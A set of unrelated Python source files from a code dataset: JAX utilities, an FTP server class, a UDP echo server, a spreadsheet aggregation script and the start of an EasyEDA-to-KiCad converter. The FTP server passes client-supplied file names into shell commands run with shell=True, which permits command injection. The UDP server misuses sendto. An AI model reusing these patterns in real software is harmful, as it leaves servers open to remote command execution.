main()","repo_name":"Zhuweilong123/motion_segment","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":18751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7913887128","text":"from functools import partial\nfrom itertools import permutations\nimport torch\nimport numpy as np\n\nimport jax\nimport jax.numpy as jnp\nfrom jax import lax\nfrom jax.tree_util import tree_flatten, tree_unflatten\n\n\ndef color_palette(n, s=0.5, offset=0.):\n s = 0.5\n r = min(s / 2, (1 - s) / 2)\n\n alpha = jnp.linspace(0, 2 * np.pi, n, endpoint=False) + offset\n alpha = alpha[:, None]\n u = jnp.ones(3) / jnp.sqrt(3)\n v = jnp.array([0., -1., 1.]) / jnp.sqrt(2)\n w = jnp.cross(u, v)\n\n colors = u + r * jnp.cos(alpha) * v + r * jnp.sin(alpha) * w\n return colors\n\n\ndef visualize_n_maps(x, *args, **kwargs):\n n = x.shape[-1]\n colors = color_palette(n, *args, **kwargs)\n canvas = x[..., jnp.newaxis] * colors\n canvas = canvas.max(axis=-2)\n return canvas\n\n\ndef angle_range(angles):\n return (angles + np.pi) % (2 * np.pi) - np.pi\n\n\ndef get_mesh_grid(shape):\n # defines axis convention\n # (0, 0) at center of image\n # x axis points to the right\n # y axis points upwards\n yy, xx = jnp.meshgrid(\n jnp.linspace(1, -1, shape[-2]),\n jnp.linspace(-1, 1, shape[-1]),\n indexing='ij')\n return xx, yy\n\n\ndef estimate_dist(s):\n # s: score map (H x W)\n s = s / s.sum()\n xx, yy = get_mesh_grid(s.shape)\n\n x_mean = (s * xx).sum()\n y_mean = (s * yy).sum()\n\n x_var = (s * (x_mean - xx) ** 2).sum()\n y_var = (s * (y_mean - yy) ** 2).sum()\n xy_var = (s * (x_mean - xx) * (y_mean -yy)).sum()\n\n mean = jnp.array([x_mean, y_mean])\n cov = jnp.array([\n [x_var, xy_var],\n [xy_var, y_var]\n ])\n return mean, cov\n\n\ndef numpy_collate(batch):\n if isinstance(batch[0], np.ndarray):\n return np.stack(batch)\n elif isinstance(batch[0], (tuple,list)):\n transposed = zip(*batch)\n return [numpy_collate(samples) for samples in transposed]\n elif isinstance(batch[0], dict):\n return {key: numpy_collate([sample[key] for sample in batch]) for key in batch[0]}\n else:\n return np.array(batch)\n\n\nclass NumpyLoader(torch.utils.data.DataLoader):\n def __init__(self, dataset, batch_size=1,\n shuffle=False, sampler=None,\n batch_sampler=None, num_workers=0,\n pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None):\n super(self.__class__, self).__init__(dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n sampler=sampler,\n batch_sampler=batch_sampler,\n num_workers=num_workers,\n collate_fn=numpy_collate,\n pin_memory=pin_memory,\n drop_last=drop_last,\n timeout=timeout,\n worker_init_fn=worker_init_fn)\n\n\ndef augment_angular_dimensions(state, angular_dof_nums):\n augmented_state = []\n for i in range(state.shape[-1]):\n if i in angular_dof_nums:\n augmented_state.append(jnp.cos(state[..., i]))\n augmented_state.append(jnp.sin(state[..., i]))\n else:\n augmented_state.append(state[..., i])\n augmented_state = jnp.stack(augmented_state, -1)\n return augmented_state\n\n\ndef construct_mass_matrix(on_diagonal, off_diagonal):\n n = len(on_diagonal)\n assert (n ** 2 - n) // 2 == len(off_diagonal)\n\n on_diagonal_idxs = (jnp.arange(n), jnp.arange(n))\n off_diagonal_idxs = jnp.tril_indices(n, -1)\n\n l = jnp.zeros((n, n))\n l = jax.ops.index_update(l, on_diagonal_idxs, on_diagonal)\n l = jax.ops.index_update(l, off_diagonal_idxs, off_diagonal)\n\n mass_matrix = l @ l.T\n return mass_matrix\n\n\ndef equation_of_motion(models, params, state, t, action):\n action = params['input_matrix_diagonal'] * action\n\n def lagrangian(q, q_t):\n M = models['mass_matrix'].apply(params['mass_matrix'], q)\n T = 0.5 * q_t.T @ M @ q_t\n V = models['potential_energy'].apply(params['potential_energy'], q)\n L = T - V\n return L.squeeze()\n\n q, q_t = jnp.split(state, 2)\n q_tt = jnp.linalg.pinv(jax.hessian(lagrangian, 1)(q, q_t)) @ (jax.grad(lagrangian, 0)(q, q_t)\n - jax.jacobian(jax.jacobian(lagrangian, 1), 0)(q, q_t) @ q_t + action)\n return jnp.concatenate([q_t, q_tt])\n\n\ndef equation_of_motion_constrained(constraint, models, params, state, t, action):\n assert models['mass_matrix'].static\n a = partial(apply, models, params) # shorthand for the models\n\n x, x_t = jnp.split(state, 2)\n input_matrix = a('input_matrix')(x)\n\n m_inv = jnp.linalg.pinv(a('mass_matrix')(x))\n f = - jax.jacobian(a('potential_energy'), 0)(x).squeeze() + input_matrix @ action\n Dphi = jax.jacobian(constraint)(x)\n DDphi = jax.jacobian(jax.jacobian(constraint))(x)\n\n l = jnp.linalg.pinv(Dphi @ m_inv @ Dphi.T) @ (Dphi @ m_inv @ f + DDphi @ x_t @ x_t)\n x_tt = m_inv @ (f - Dphi.T @ l)\n return jnp.concatenate([x_t, x_tt])\n\n\ndef equation_of_motion_constrained_general(constraint, models, params, state, t, action):\n # general formulation, a little bit slower\n\n def lagrangian(x, x_t):\n M = models['mass_matrix'].apply(params['mass_matrix'], x)\n T = 0.5 * x_t.T @ M @ x_t\n V = models['potential_energy'].apply(params['potential_energy'], x)\n L = T - V\n return L.squeeze()\n\n x, x_t = jnp.split(state, 2)\n input_matrix = models['input_matrix'].apply(params['input_matrix'], x)\n\n m_inv = jnp.linalg.pinv(jax.hessian(lagrangian, 1)(x, x_t))\n f = jax.grad(lagrangian, 0)(x, x_t) - jax.jacobian(jax.jacobian(lagrangian, 1), 0)(x, x_t) @ x_t + input_matrix @ action\n Dphi = jax.jacobian(constraint)(x)\n DDphi = jax.jacobian(jax.jacobian(constraint))(x)\n\n l = jnp.linalg.pinv(Dphi @ m_inv @ Dphi.T) @ (Dphi @ m_inv @ f + DDphi @ x_t @ x_t)\n x_tt = m_inv @ (f - Dphi.T @ l)\n return jnp.concatenate([x_t, x_tt])\n\n\ndef interpolate_bilinear(image, i, j, pad_zero=True, relative_coordinates=True):\n \"\"\"\n from https://github.com/google/jax/issues/862\n based on http://stackoverflow.com/a/12729229\n \n Interpolate bilinearly at coordinates (i, j) in image.\n image: (height, width)\n rows: (nb_points,) relative coordinates\n cols: (nb_points,) relative coordinates\n returns interpolated values (nb_points,)\n \"\"\"\n if relative_coordinates:\n i *= image.shape[0]\n j *= image.shape[1]\n if pad_zero:\n image = jnp.pad(image, ((1, 1), (1, 1)))\n i += 1\n j += 1\n height, width = image.shape\n i_0 = jnp.floor(i).astype(jnp.int32)\n i_1 = i_0 + 1\n j_0 = jnp.floor(j).astype(jnp.int32)\n j_1 = j_0 + 1\n\n def rclip(i): return jnp.clip(i, 0, height - 1)\n def cclip(j): return jnp.clip(j, 0, width - 1)\n Ia = image[rclip(i_0), cclip(j_0)]\n Ib = image[rclip(i_1), cclip(j_0)]\n Ic = image[rclip(i_0), cclip(j_1)]\n Id = image[rclip(i_1), cclip(j_1)]\n\n wa = (j_1 - j) * (i_1 - i)\n wb = (j_1 - j) * (i - i_0)\n wc = (j - j_0) * (i_1 - i)\n wd = (j - j_0) * (i - i_0)\n\n return wa*Ia + wb*Ib + wc*Ic + wd*Id\n\n\ndef explicit_euler(f, x0, t, *args):\n dt = t[1] - t[0]\n def f_(x, t):\n x_dot = f(x, t, *args)\n x_new = x + x_dot * dt\n return x_new, x_new\n _, history = lax.scan(f_, x0, t[1:])\n history = jnp.concatenate([x0[None], history])\n return history\n\n\ndef sum_losses(loss_fn, loss_weights):\n def f(*args):\n losses = loss_fn(*args)\n loss = sum([loss_weights[key] * losses[key] for key in losses])\n return loss, losses\n return f\n\n\ndef reduce_mean(fn, axis=0):\n return lambda *args: jax.tree_map(lambda x: jnp.mean(x, axis=axis), fn(*args))\n\n\ndef apply(models, params, key):\n return partial(models[key].apply, params[key])\n\n\ndef loss_fn_batched(loss_fn, params, batch, reduction='mean'):\n assert reduction in [None, 'mean', 'sum']\n value = jax.vmap(loss_fn, in_axes=(None, 0))(params, batch)\n\n if reduction:\n value_flat, value_tree = tree_flatten(value)\n if reduction == 'mean':\n value_flat_reduced = [jnp.mean(v, axis=0) for v in value_flat]\n elif reduction == 'sum':\n value_flat_reduced = [jnp.sum(v, axis=0) for v in value_flat]\n value = tree_unflatten(value_tree, value_flat_reduced)\n return value\n\n\ndef get_permutations(n):\n return list(permutations(range(n)))\n\n\ndef get_permutated_keypoints(keypoints, axis):\n num_keypoints = keypoints.shape[axis]\n permutated_keypoints = jnp.stack([keypoints.take(p, axis=axis) for p in permutations(range(num_keypoints))])\n return permutated_keypoints\n\n\ndef finite_difference(x, dt, mode='central', order=1):\n # x.shape = (num_timesteps, ...)\n assert mode in ['backward', 'central']\n assert order in [1, 2]\n if order == 2:\n x, x_t = finite_difference(x, dt, mode=mode)\n x_t, x_tt = finite_difference(x_t, dt, mode=mode)\n if mode == 'backward':\n return x[1:], x_t, x_tt\n elif mode == 'central':\n return x[1:-1], x_t, x_tt\n elif mode == 'backward':\n x_t = (x[1:] - x[:-1]) / dt\n return x[1:], x_t\n elif mode == 'central':\n x_t = (x[2:] - x[:-2]) / (2 * dt)\n return x[1:-1], x_t\n","repo_name":"rdaems/keycld","sub_path":"keycld/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":9134,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"38176688453","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:ZF\n\n\n# import socketserver\nimport json\nimport subprocess\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nimport hashlib\nfrom lib import commons\nfrom conf import settings\n\n\nclass Ftpserver(object):\n USER_DICT = {}\n\n def __init__(self, conn):\n self.request = conn\n\n @staticmethod\n def create_user():\n name = input(\"username:\").strip()\n pwd = input(\"password:\").strip()\n pwd1 = input(\"Re-enter password:\").strip()\n if pwd == pwd1:\n e_flag = False\n while not e_flag:\n t_quota = input(\"请输入磁盘配额(1-500M):\").strip()\n if 1 <= int(t_quota) <= 500:\n disk_quota = int(t_quota) * 1024 * 1024\n home_path = os.path.join(settings.DIR, name)\n print(home_path)\n if not os.path.exists(home_path):\n os.system('mkdir' + ' ' + home_path)\n Ftpserver.USER_DICT = Ftpserver.db_init()\n if Ftpserver.USER_DICT is None:\n Ftpserver.USER_DICT = {}\n if name not in Ftpserver.USER_DICT:\n Ftpserver.USER_DICT[name] = {\n \"action\": '',\n \"username\": name,\n \"password\": commons.md5(pwd),\n \"quota\": disk_quota,\n \"home_dir\": name,\n \"current_dir\": name,\n \"filename\": '',\n \"size\": '',\n \"position\": '',\n \"overridden\": False,\n \"status\": ''\n }\n Ftpserver.db_dump(Ftpserver.USER_DICT)\n print(\"用户创建成功!\")\n e_flag = True\n else:\n print(\"用户存在!\")\n e_flag = True\n else:\n print(\"请输入配额范围数值!\")\n else:\n print(\"你的密码两次输入不一致,请重新输入!\")\n\n # def handle(self):\n # # print(self.request, self.client_address, self.server)\n #\n # while True:\n # print(\"wait for request...\")\n # try:\n # data = self.request.recv(1024).strip()\n # # print(\"{} wrote:\".format(self.client_address[0]))\n # print(data)\n # if len(data) == 0:\n # break\n # else:\n # cmd_dic = json.loads(data.decode())\n # action = cmd_dic['action']\n # if hasattr(self, action):\n # func = getattr(self, action)\n # func(cmd_dic)\n # # self.request.send(data.upper())\n # except ConnectionResetError as e:\n # print(\"err\", e)\n # break\n\n def login(self, *args):\n cmd_dic = args[0]\n username = cmd_dic.get('username')\n Ftpserver.USER_DICT = Ftpserver.db_init()\n if username in Ftpserver.USER_DICT:\n if Ftpserver.USER_DICT[username]['password'] == cmd_dic.get('password'):\n print(\"登录成功!\")\n Ftpserver.USER_DICT[username]['status'] = '300'\n print(Ftpserver.USER_DICT)\n self.request.send(bytes(json.dumps(Ftpserver.USER_DICT[username]).encode()))\n pass\n else:\n Ftpserver.USER_DICT[username]['status'] = '301'\n print(\"密码错误,登录失败!\")\n self.request.send(bytes(json.dumps(Ftpserver.USER_DICT[username]).encode()))\n else:\n msg_dic = {\"status\": '302'}\n # Ftpserver.USER_DICT[username]['status'] = '302'\n # print(\"用户不存在���\")\n # self.request.send(b'302')\n self.request.send(bytes(json.dumps(msg_dic).encode()))\n pass\n\n def cd(self, *args):\n cmd_dic = args[0]\n # filename = cmd_dic['filename']\n filename = cmd_dic.get('filename')\n current_dir = cmd_dic.get('current_dir')\n home_dir = cmd_dic.get('home_dir')\n if filename == '..':\n if home_dir == current_dir:\n msg = 'In the current directory for the home directory, cannot change'\n print(msg)\n cmd_dic['status'] = '402'\n cmd_dic['mesg'] = msg\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n else:\n tmp = os.path.split(current_dir)\n current_dir = tmp[0]\n cmd_dic['current_dir'] = current_dir\n cmd_dic['status'] = '400'\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n pass\n elif filename == '.':\n cmd_dic['status'] = '400'\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n\n elif filename.startswith('/'):\n t1 = filename.split('/')\n print(t1)\n if home_dir == t1[1]:\n c_filename = filename.strip('/')\n print(c_filename)\n f_filename = os.path.join(settings.DIR, c_filename)\n print(filename)\n print(f_filename)\n if os.path.isdir(f_filename):\n t = cmd_dic.get('filename')\n cmd_dic['current_dir'] = t.strip('/')\n print(cmd_dic.get('current_dir'))\n cmd_dic['status'] = '400'\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n pass\n else:\n cmd_dic['status'] = '401'\n print(\"Directory not exsits\")\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n else:\n cmd_dic['status'] = '401'\n print(\"You have to change the directory is not in your user directory\")\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n # elif filename.startswith(home_dir):\n # f_filename = os.path.join(settings.DIR, filename)\n # print(filename)\n # print(f_filename)\n # if os.path.isdir(f_filename):\n # cmd_dic['current_dir'] = os.path.join(current_dir, filename)\n # print(cmd_dic.get('current_dir'))\n # cmd_dic['status'] = '400'\n # self.request.send(bytes(json.dumps(cmd_dic).encode()))\n # pass\n # else:\n # cmd_dic['status'] = '401'\n # print(\"Directory not exsits\")\n # self.request.send(bytes(json.dumps(cmd_dic).encode()))\n else:\n tmp_str = filename.strip('/')\n t_list = tmp_str.split('/')\n print(t_list)\n print(settings.DIR)\n print(home_dir)\n print(tmp_str)\n if len(t_list) == 1:\n f_filename = os.path.join(settings.DIR, home_dir, tmp_str)\n print(f_filename)\n if os.path.isdir(f_filename):\n cmd_dic['current_dir'] = os.path.join(current_dir, filename)\n print(cmd_dic.get('current_dir'))\n cmd_dic['status'] = '400'\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n pass\n else:\n cmd_dic['status'] = '401'\n print(\"You have to change the directory is not in your user directory\")\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n elif len(t_list) > 1:\n if home_dir == t_list[0]:\n f_filename = os.path.join(settings.DIR, tmp_str)\n print(f_filename)\n if os.path.isdir(f_filename):\n cmd_dic['current_dir'] = filename\n print(cmd_dic.get('current_dir'))\n cmd_dic['status'] = '400'\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n pass\n else:\n cmd_dic['status'] = '401'\n print(\"Directory not exsits\")\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n else:\n msg = 'You have to change the directory is not in your user directory'\n cmd_dic['status'] = '402'\n cmd_dic['mesg'] = msg\n self.request.send(bytes(json.dumps(cmd_dic).encode()))\n\n def ls(self, *args):\n cmd_dic = args[0]\n if 'filename' in cmd_dic:\n filename = cmd_dic.get('filename')\n current_dir = os.path.join(settings.DIR, cmd_dic.get('current_dir'), filename)\n print(current_dir)\n if os.path.isdir(current_dir):\n cmd_str = 'ls' + ' ' + current_dir\n print(filename, current_dir)\n p = subprocess.Popen(cmd_str, shell=True, stdout=subprocess.PIPE)\n res = p.stdout.read()\n if len(res) == 0:\n send_data = 'View the directory is empty'\n mesg_dic = {\"mesg\": send_data, \"size\": len(send_data), \"res\": 0}\n self.request.send(bytes(json.dumps(mesg_dic).encode()))\n #self.request.send(bytes(send_data.encode()))\n else:\n msg_dic = {\n \"size\": len(res),\n \"res\": len(res)\n }\n self.request.send(bytes(json.dumps(msg_dic).encode()))\n c_response = self.request.recv(1024)\n if c_response == b'100':\n # print(res)\n send_data = str(res, encoding='utf-8')\n print(send_data)\n self.request.send(bytes(send_data.encode()))\n else:\n msg = \"View the directory does not exist\"\n print(msg)\n mesg_dic = {\"mesg\": msg, \"size\": len(msg), \"res\": 0}\n self.request.send(bytes(json.dumps(mesg_dic).encode()))\n #self.request.send(bytes(msg.encode()))\n\n def mkdir(self, *args):\n cmd_dic = args[0]\n if 'filename' in cmd_dic:\n filename = cmd_dic.get('filename')\n # t_dir = os.path.join(settings.DIR, cmd_dic.get('current_dir'))\n # new_dir = os.path.join(t_dir, filename)\n new_dir = os.path.join(settings.DIR, cmd_dic.get('current_dir'), filename)\n print(new_dir)\n if os.path.isdir(new_dir):\n self.request.send(b'99')\n print(\"The path is exists!\")\n else:\n cmd_str = 'mkdir' + ' ' + new_dir\n p = subprocess.Popen(cmd_str, shell=True, stdout=subprocess.PIPE)\n res = p.stdout.read()\n if len(res) == 0:\n self.request.send(b'100')\n print(\"the directory create successful!\")\n\n def put(self, *args):\n cmd_dic = args[0]\n current_dir = cmd_dic.get('current_dir')\n # home_dir = cmd_dic['home_dir']\n filename = os.path.join(settings.DIR, current_dir, cmd_dic.get('filename'))\n print(filename)\n filesize = cmd_dic.get('size')\n username = cmd_dic.get('username')\n t = Ftpserver.USER_DICT[username]['quota']\n print(t)\n user_quota = int(Ftpserver.USER_DICT[username]['quota'])\n print(user_quota)\n if os.path.isfile(filename): # 判断上传的文件是否已经存在\n e_filesize = os.stat(filename).st_size\n print(e_filesize)\n if e_filesize == filesize: # 判断上传的文件与已经存在的文件大小是否相等\n msg = \"The file is exsit\"\n msg_dic = {\n \"action\": \"put\",\n \"filename\": filename,\n \"size\": filesize,\n \"position\": '',\n \"overridden\": False,\n \"current_dir\": current_dir,\n \"msg\": msg,\n \"status\": '206'\n }\n self.request.send(bytes(json.dumps(msg_dic).encode('utf-8')))\n r_data = json.loads(self.request.recv(1024).decode())\n if r_data['overridden']: # 判断是否要覆盖已经存在的文件\n f = open(filename, 'wb')\n r_data['status'] = '200'\n self.request.send(bytes(json.dumps(r_data).encode('utf-8'))) # 最好也使用json格式进行返回, 可以包含状态码等信息\n received_size = 0\n m = hashlib.md5()\n while received_size < filesize:\n if filesize - received_size > 1024:\n size = 1024\n else:\n size = filesize - received_size\n data = self.request.recv(size)\n f.write(data)\n received_size += len(data)\n m.update(data)\n else:\n self.request.send(bytes(m.hexdigest().encode())) # 发送MD5值\n f.close()\n print(\"file recevied success\")\n pass\n else:\n pass\n elif e_filesize < cmd_dic.get('size'): # 判断已经存在的文件小于即将上传的文件,表示已经存在的文件不完整\n f = open(filename, 'ab')\n f_position = f.tell()\n print(f_position)\n msg_dic = {\n \"action\": \"put\",\n \"filename\": filename,\n \"size\": filesize,\n \"position\": f_position,\n \"overridden\": False,\n \"current_dir\": current_dir,\n \"msg\": '',\n \"status\": '207',\n \"quota\": ''\n }\n self.request.send(bytes(json.dumps(msg_dic).encode('utf-8')))\n # r_data = json.loads(self.request.recv(1024))\n # f = open(filename, 'ab')\n received_size = f_position\n m = hashlib.md5()\n while received_size < filesize:\n if filesize - received_size > 1024:\n size = 1024\n else:\n size = filesize - received_size\n data = self.request.recv(size)\n f.seek(f_position) # 定位断点的位置\n f.write(data) # 从断点的位置开始写\n received_size += len(data)\n m.update(data)\n else:\n self.request.send(bytes(m.hexdigest().encode()))\n f.close()\n Ftpserver.USER_DICT[username]['quota'] = user_quota - received_size\n Ftpserver.db_dump(Ftpserver.USER_DICT)\n print(\"file recevied success\")\n pass\n else:\n if user_quota >= filesize: # 判断磁盘配额剩余空间大于上传文件大小\n f = open(filename, 'wb')\n # print(\"file not exist\", filename)\n msc_dic = {\"status\": '200'}\n self.request.send(bytes(json.dumps(msc_dic).encode('utf-8'))) # 最好也使用json格式进行返回, 可以包含状态码等信息\n received_size = 0\n m = hashlib.md5()\n while received_size < filesize:\n data = self.request.recv(1024)\n f.write(data)\n received_size += len(data)\n m.update(data)\n else:\n self.request.send(bytes(m.hexdigest().encode()))\n f.close()\n Ftpserver.USER_DICT[username]['quota'] = user_quota - received_size\n Ftpserver.db_dump(Ftpserver.USER_DICT)\n # file_md5 = self.request.recv(1024)\n # if file_md5.decode() == m.hexdigest():\n print(\"file recevied success\")\n elif user_quota < filesize:\n msg = '''\n Disk quota remaining space %d,the quota is not enought, please contact administrator!\n\n ''' % user_quota\n msg_dic = {\n \"action\": \"put\",\n \"filename\": filename,\n \"size\": filesize,\n \"position\": '',\n \"overridden\": False,\n \"current_dir\": current_dir,\n \"msg\": msg,\n \"status\": '208',\n \"quota\": user_quota\n }\n self.request.send(bytes(json.dumps(msg_dic).encode('utf-8')))\n\n def get(self, *args):\n cmd_dic = args[0]\n filename = cmd_dic.get('filename')\n current_dir = cmd_dic.get('current_dir')\n tmp = filename.split('/')\n # c_filesize = cmd_dic['filesize']\n\n if len(tmp) == 1:\n f_filename = os.path.join(settings.DIR, current_dir, filename)\n else:\n f_filename = os.path.join(settings.DIR, filename)\n print(f_filename)\n if os.path.isfile(f_filename): # 服务器上存在文件\n filesize = os.stat(f_filename).st_size\n if cmd_dic.get('status') == '199': # 判断是否进行断点续传\n msg_dic = {\n \"action\": \"get\",\n \"filename\": filename,\n \"size\": filesize,\n \"status\": '200'\n }\n self.request.send(bytes(json.dumps(msg_dic).encode(\"utf-8\")))\n client_response = self.request.recv(1024)\n print(client_response)\n if client_response == b'ok':\n f = open(f_filename, 'rb')\n f.seek(cmd_dic.get('position'))\n m = hashlib.md5()\n for line in f:\n m.update(line)\n self.request.sendall(line)\n f.close()\n client_response1 = self.request.recv(1024)\n if client_response1 == b'finish':\n self.request.send(bytes(m.hexdigest().encode('utf-8')))\n print(\"file send finish!\")\n else: # 传送全部文件数据\n filesize = os.stat(f_filename).st_size\n msg_dic = {\n \"action\": \"get\",\n \"filename\": filename,\n \"size\": filesize,\n \"status\": '200'\n }\n self.request.send(bytes(json.dumps(msg_dic).encode(\"utf-8\")))\n client_response = self.request.recv(1024)\n if client_response == b'ok':\n f = open(f_filename, 'rb')\n m = hashlib.md5()\n for line in f:\n m.update(line)\n self.request.sendall(line)\n f.close()\n client_response1 = self.request.recv(1024)\n if client_response1 == b'finish':\n self.request.send(bytes(m.hexdigest().encode('utf-8')))\n print(\"file send finish!\")\n else: # 服务器上不存在文件\n msg = \"file is not exist!\"\n print(msg)\n msg_dic = {\"status\": '202', \"mesg\": msg}\n self.request.send(bytes(json.dumps(msg_dic).encode(\"utf-8\")))\n\n @staticmethod\n def db_init():\n \"\"\"\n 配置文件全部读取\n :return:\n \"\"\"\n if os.path.exists(os.path.join(settings.Data_DIR, 'userinfo')):\n with open(os.path.join(settings.Data_DIR, 'userinfo'), 'r') as f:\n d_dict = json.load(f)\n return d_dict\n\n @staticmethod\n def db_dump(d_dict):\n \"\"\"\n 配置文件全部写入\n :param d_dict:\n :return:\n \"\"\"\n with open(os.path.join(settings.Data_DIR, 'userinfo'), 'w') as f:\n json.dump(d_dict, f)\n return True\n\n\n# if __name__ == \"__main__\":\n# info = '''\n# 1.创建FTP用户\n# 2.运行FTP服务\n# '''\n# print(info)\n# inp = input(\"请输入选择的编号:\")\n# if inp == '1':\n# Ftpserver.create_user()\n# elif inp == '2':\n# # HOST, PORT = \"0.0.0.0\", 9999\n# HOST, PORT = \"localhost\", 9999\n# # Create the server, binding to localhost on port 9999\n# # server1 = socketserver.ThreadingTCPServer((HOST, PORT), Ftpserver)\n# print(\"FTPserver is running\")\n# # server1.serve_forever()\n# else:\n# print(\"请输入编号进行操作!\")\n","repo_name":"KC9226/ftp_v6","sub_path":"ftp_server/lib/ftpclass.py","file_name":"ftpclass.py","file_ext":"py","file_size_in_byte":21330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25481588484","text":"import socket\n\nSERVER_HOST = \"127.0.0.1\"\nSERVER_PORT = 8080\n\ndef main():\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.bind((SERVER_HOST, SERVER_PORT))\n print(\"[Server] Server started.\")\n print(\"[Server] Waiting for connection...\")\n\n while True:\n data, client_addr = sock.recvfrom(100)\n print(\"[Server] Client%s:%s: \" % client_addr, end=\":\")\n data = data.decode(\"UTF8\")\n print(data)\n if data == \"exit\":\n sock.sendto(\"exit\".encode(\"UTF8\"))\n break\n else:\n sock.sendto(data.encode(\"UTF8\"), client_addr)\n \n sock.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"xdai02/Computer_Networking","sub_path":"code/Python/Chapter2/2-8/udp_server.py","file_name":"udp_server.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24398408877","text":"import sys\nsys.path.append(\"..\")\nfrom pcm_segmenter import postprocess, io\nimport pandas\n\nEXCEL_FILES = (\"pipeline_2018-06-13.xlsx\",\n \"pipeline_2018-07-26.xlsx\",\n \"pipeline_2018-08-08.xlsx\",\n \"pipeline_2018-09-07.xlsx\",\n \"pipeline_2018-09-21.xlsx\",\n \"pipeline_2018-10-04.xlsx\")\n\nOUTPUT_FILE = \"manuscript_analyses_aggregated\"\n\ncombined_dataframe = io.read_dataframe_from_excel(name=EXCEL_FILES[0], directory=\".\")\nfor file in EXCEL_FILES[1:]:\n dataframe = io.read_dataframe_from_excel(name=file, directory=\".\")\n combined_dataframe = postprocess.concatenate_pandas_dataframes([combined_dataframe, dataframe])\n\nio.write_results_to_excel(combined_dataframe, name=OUTPUT_FILE, directory=\".\")\n","repo_name":"siboles/pcm_segmenter","sub_path":"scripts/manuscript_postprocess.py","file_name":"manuscript_postprocess.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21205166410","text":"# Global imports\nimport logging\nfrom typing import Callable, List, Tuple, Union\n\nfrom easyeda2kicad.easyeda.parameters_easyeda import (\n EasyedaPinType,\n EeSymbol,\n EeSymbolArc,\n EeSymbolBbox,\n EeSymbolCircle,\n EeSymbolEllipse,\n EeSymbolPath,\n EeSymbolPin,\n EeSymbolPolygon,\n EeSymbolPolyline,\n EeSymbolRectangle,\n)\nfrom easyeda2kicad.easyeda.svg_path_parser import SvgPathEllipticalArc, SvgPathMoveTo\nfrom easyeda2kicad.helpers import get_middle_arc_pos\nfrom easyeda2kicad.kicad.export_kicad_footprint import compute_arc\nfrom easyeda2kicad.kicad.parameters_kicad_symbol import *\n\nee_pin_type_to_ki_pin_type = {\n EasyedaPinType.unspecified: KiPinType.unspecified,\n EasyedaPinType._input: KiPinType._input,\n EasyedaPinType.output: KiPinType.output,\n EasyedaPinType.bidirectional: KiPinType.bidirectional,\n EasyedaPinType.power: KiPinType.power_in,\n}\n\n\ndef px_to_mil(dim: Union[int, float]) -> int:\n return int(10 * dim)\n\n\ndef px_to_mm(dim: Union[int, float]) -> float:\n return 10.0 * dim * 0.0254\n\n\ndef convert_ee_pins(\n ee_pins: List[EeSymbolPin], ee_bbox: EeSymbolBbox, kicad_version: KicadVersion\n) -> List[KiSymbolPin]:\n\n to_ki: Callable = px_to_mil if kicad_version == KicadVersion.v5 else px_to_mm\n # pin_spacing = (\n # KiExportConfigV5.PIN_SPACING.value\n # if kicad_version == KicadVersion.v5\n # else KiExportConfigV6.PIN_SPACING.value\n # )\n\n kicad_pins = []\n for ee_pin in ee_pins:\n pin_length = abs(int(float(ee_pin.pin_path.path.split(\"h\")[-1])))\n\n ki_pin = KiSymbolPin(\n name=ee_pin.name.text.replace(\" \", \"\"),\n number=ee_pin.settings.spice_pin_number.replace(\" \", \"\"),\n style=KiPinStyle.line,\n length=to_ki(pin_length),\n type=ee_pin_type_to_ki_pin_type[ee_pin.settings.type],\n orientation=ee_pin.settings.rotation,\n pos_x=to_ki(int(ee_pin.settings.pos_x) - int(ee_bbox.x)),\n pos_y=-to_ki(int(ee_pin.settings.pos_y) - int(ee_bbox.y)),\n )\n\n if ee_pin.dot.is_displayed and ee_pin.clock.is_displayed:\n ki_pin.style = KiPinStyle.inverted_clock\n elif ee_pin.dot.is_displayed:\n ki_pin.style = KiPinStyle.inverted\n elif ee_pin.clock.is_displayed:\n ki_pin.style = KiPinStyle.clock\n\n # Deal with different pin length\n # if ee_pin.settings.rotation == 0:\n # ki_pin.pos_x -= to_ki(pin_length) - pin_spacing\n # elif ee_pin.settings.rotation == 180:\n # ki_pin.pos_x += to_ki(pin_length) - pin_spacing\n # elif ee_pin.settings.rotation == 90:\n # ki_pin.pos_y -= to_ki(pin_length) - pin_spacing\n # elif ee_pin.settings.rotation == 270:\n # ki_pin.pos_y += to_ki(pin_length) - pin_spacing\n\n kicad_pins.append(ki_pin)\n\n return kicad_pins\n\n\ndef convert_ee_rectangles(\n ee_rectangles: List[EeSymbolRectangle],\n ee_bbox: EeSymbolBbox,\n kicad_version: KicadVersion,\n) -> List[KiSymbolRectangle]:\n\n to_ki: Callable = px_to_mil if kicad_version == KicadVersion.v5 else px_to_mm\n\n kicad_rectangles = []\n for ee_rectangle in ee_rectangles:\n ki_rectangle = KiSymbolRectangle(\n pos_x0=to_ki(int(ee_rectangle.pos_x) - int(ee_bbox.x)),\n pos_y0=-to_ki(int(ee_rectangle.pos_y) - int(ee_bbox.y)),\n )\n 